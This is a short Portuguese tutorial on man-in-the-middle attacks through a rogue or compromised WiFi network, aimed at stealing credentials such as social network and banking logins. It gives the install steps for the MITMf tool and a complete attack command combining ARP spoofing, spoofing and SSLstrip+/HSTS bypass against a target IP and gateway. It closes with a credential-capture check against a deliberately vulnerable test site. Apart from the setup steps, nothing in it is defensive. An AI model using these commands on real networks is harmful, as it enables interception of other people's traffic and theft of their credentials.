É uma forma de ataque em que os dados trocados entre duas partes são interceptados sem que elas percebam.

Nesse tipo de ataque, o atacante utiliza um ponto de acesso WiFi para interceptar os dados trafegados pela suas vítimas, o que pode ser feito com a utilização de um Roteador WiFi ou através da configuração do notebook do atacante como um Roteador WiFi. Quando o usuário se conecta à rede disponibilizada pelo atacante, todo o tráfego com destino a internet é monitorado pelo atacante sendo possível até mesmo obter credenciais de redes sociais, internet banking e outros dados sigilosos.

1. apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file

2. git clone https://github.com/hackthreat/MITMF

3. cd MITMF && git submodule init && git submodule update --recursive

4. pip install -r requirements.txt (se o pip não estiver instalado na sua maquina instale usando apt-get install python-pip)

5. python mitmf.py --help (ajuda sobre a execução e parametros do script)

1. python mitmf.py --hsts --arp --spoof -i wlan0 --target 192.168.0.10 --gateway 192.168.0.1

• --hsts (Carrega o Plugin SSLstrip +)
• --arp (Redireciona o trafego usando ARP spoofing)
• --spoof (Carrega o Plugin Spoofing)
• -i (seleciona a interface de rede wlan0 para wifi eth0 para rede cabeada)
• --target (informar o ip a ser atacado)
• --gateway (informar o gateway padrão da rede)

1. Acessar o site http://testphp.vulnweb.com/login.php
2. No campo de Login e Senha informar a senha admin e login admin
3. Retornar a maquina onde estamos rodando o MITMF.
4. verificar nos logs se foi capturado a senha e login da vitima.